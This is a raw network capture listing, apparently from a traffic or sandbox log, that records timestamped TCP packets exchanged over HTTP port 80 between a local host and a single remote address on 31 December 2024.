                                                        Dec 31, 2024 09:28:25.712933064 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.712943077 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.712987900 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.713006973 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.713018894 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.713067055 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.713114023 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.713125944 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.713138103 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.713150024 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.713167906 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.713188887 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.713263988 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.713274956 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.713289976 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.713329077 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.713375092 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.713392019 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.713402987 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.713414907 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.713421106 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.713442087 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.713535070 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.713546991 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.713557959 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.713568926 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.713577032 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.713587999 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.713598013 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.713643074 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.713670969 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.713680029 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.713717937 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.713802099 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.713813066 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.713824987 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.713835955 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.713846922 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.713856936 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.713865042 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.713875055 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.713886023 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.713892937 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.713901043 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.713932037 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.714055061 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.714066029 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.714108944 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.714122057 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.714132071 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.714159966 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.716130972 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.716140985 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.716187954 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.716197014 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.716207981 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.716217995 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.716245890 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.716325045 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.716336012 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.716347933 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.716357946 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.716367006 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.716387033 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.716449022 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.716463089 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.716484070 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.716531992 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.716542959 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.716586113 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.716602087 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.716612101 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.716646910 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.716866016 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.716887951 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.716909885 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.716932058 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.716975927 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.716995001 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.717006922 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.717046976 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.717055082 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.717067003 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.717108965 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.717226982 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.717242956 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.717255116 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.717266083 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.717279911 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.717284918 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.717294931 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.717304945 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.717329979 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.717365026 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.717376947 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.717425108 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.717497110 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.717509031 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.717540026 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.717560053 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.717571020 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.717582941 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.717593908 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.717609882 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.717617989 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.717643023 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.717704058 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.718410015 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.718429089 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.718440056 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.718447924 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.718473911 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.718481064 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.718555927 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.718568087 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.718604088 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.718667030 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.718677998 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.718689919 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.718703032 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.718708992 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.718756914 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.718820095 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.718831062 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.718847990 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.718867064 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.718888044 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.718907118 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.718918085 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.718950033 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.721328020 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.784849882 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.784868956 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.784883022 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.784971952 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.784986973 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.784998894 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.785011053 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.785069942 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.785216093 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.785228968 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.785243034 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.785253048 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.785262108 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.785269022 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.785276890 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.785289049 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.785300016 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.785317898 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.785348892 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.785432100 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.785442114 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.785499096 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.785847902 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.785870075 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.785881996 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.785911083 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.786010027 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.786050081 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.786068916 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.786109924 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.786120892 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.786132097 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.786140919 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.786171913 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.786282063 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.786292076 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.786302090 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.786314011 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.786324024 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.786331892 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.786355019 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.786500931 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.786513090 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.786545038 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.800371885 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.800404072 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.800415993 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.800457954 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.800474882 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.800542116 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.800554037 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.800595999 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.800614119 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.800626040 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.800653934 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.800753117 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.800764084 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.800775051 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.800786972 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.800795078 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.800805092 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.800848961 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.800968885 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.800980091 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.800992012 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.801009893 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.801033020 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.801115990 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.801125050 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.801136017 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.801153898 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.801182032 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.801201105 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.801250935 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.801348925 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.801361084 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.801372051 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.801386118 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.801390886 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.801403046 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.801409006 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.801419020 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.801453114 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.801599026 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.801644087 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.801723003 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.801733971 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.801744938 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.801755905 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.801772118 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.801784039 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.801795959 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.801803112 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.801814079 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.801820993 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.801831961 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.801851034 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.801871061 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.803730011 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.803749084 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.803780079 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.803821087 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.803847075 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.803859949 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.803864956 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.803909063 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.803985119 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.803997040 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.804008007 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.804023981 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.804033995 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.804056883 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.804124117 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.804136038 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.804146051 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.804156065 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.804181099 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.804193974 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.804267883 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.804280043 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.804323912 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.804533958 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.804579020 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.804589987 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.804611921 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.804620028 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.804657936 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.804677010 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.804735899 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.804745913 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.804757118 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.804769993 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.804775953 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.804792881 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.804884911 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.804897070 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.804932117 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.805042028 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.805053949 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.805066109 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.805079937 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.805085897 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.805097103 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.805104017 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.805111885 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.805135012 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.805165052 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.805175066 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.805186033 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.805197001 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.805205107 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.805214882 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.805227995 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.805238008 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.805248022 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.805260897 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.805289030 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.805979013 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.806000948 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.806011915 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.806040049 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.806152105 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.806169033 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.806180954 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.806189060 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.806197882 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.806215048 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.806329966 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.806341887 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.806353092 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.806366920 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.806375980 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.806385040 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.806452990 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.806473017 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.806484938 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.806493998 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.806499958 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.806516886 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.810172081 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.872370958 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.872386932 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.872399092 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.872452021 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.872482061 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.872493982 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.872575045 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.872591019 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.872601032 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.872612000 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.872644901 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.872644901 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.873445034 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.873491049 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.873502016 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.873560905 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.873608112 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.873619080 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.873630047 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.873682976 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.873682976 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.873732090 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.873823881 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.873840094 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.873852015 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.873867035 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.873872995 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.873886108 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.873907089 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.873943090 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.874135971 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.874146938 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.874162912 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.874175072 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.874186039 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.874195099 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.874205112 CET804970887.120.113.91192.168.2.8
